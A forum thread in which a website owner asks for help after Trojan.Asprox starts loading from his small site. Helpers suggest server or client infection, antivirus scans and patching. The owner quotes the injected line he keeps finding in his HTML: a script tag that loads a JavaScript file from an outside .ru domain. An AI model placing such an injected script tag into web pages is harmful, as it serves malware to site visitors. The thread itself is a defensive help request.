Someone please help me! I made a simple website from scratch for my work with CS3, uploaded it to my server and for a week it was cool. A few days ago Trojan.Asprox started loading from our website every time I view it. Dose anyone know how someone would get this thing into my server site and how do I find it in my HTLM pages? How do I prevent it from happening again? This thing is driving me crazy! I don’t know much about this kind of thing, please help!

    Welcome to Major Geeks!

A far as I know it is not in the HTML code. See the below link:

    http://www.symantec.com/security_response/writeup.jsp?docid=2007-060812-4603-99&tabid=2

Perhaps your server or clients are infected and need to be cleaned.

If you want to check for infections, you should run the following the instructions in the below link and attach the requested logs when you finish these instructions.
    • If something does not run, write down the info to explain to us later but keep on going.
    • Do not assume that because one step does not work that they all will not.
    Notes:

    1. If you run into problems trying to run theREAD & RUN ME or any of the scans in normal boot mode. You can running steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
    2. If you have problems downloading on the problem PC, download the tools on another PC and burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.

Thank you, That is the same page one of my antivirus shows me too, what is strang is every day or two, this trojan shows up and when it dose, i find this nice little line in the bottom of the HTML...
    <script src=http://www.jkn3.ru/js.js></script>
I take it out , then upload a cleaned copy to my site, then its fine! I should not have to upload my site everyday right? What do you think?
    My site is www.tucsonamphicorps.com
    thanks, John Kelley

As I said in my last message, either the server or the clients may have an infection somewhere. Also the other thing to consider is whether they are properly protected with antivirus, antispyware, hardware and software firewalls, all application especially Windows up to date with ALL security patches....etc.
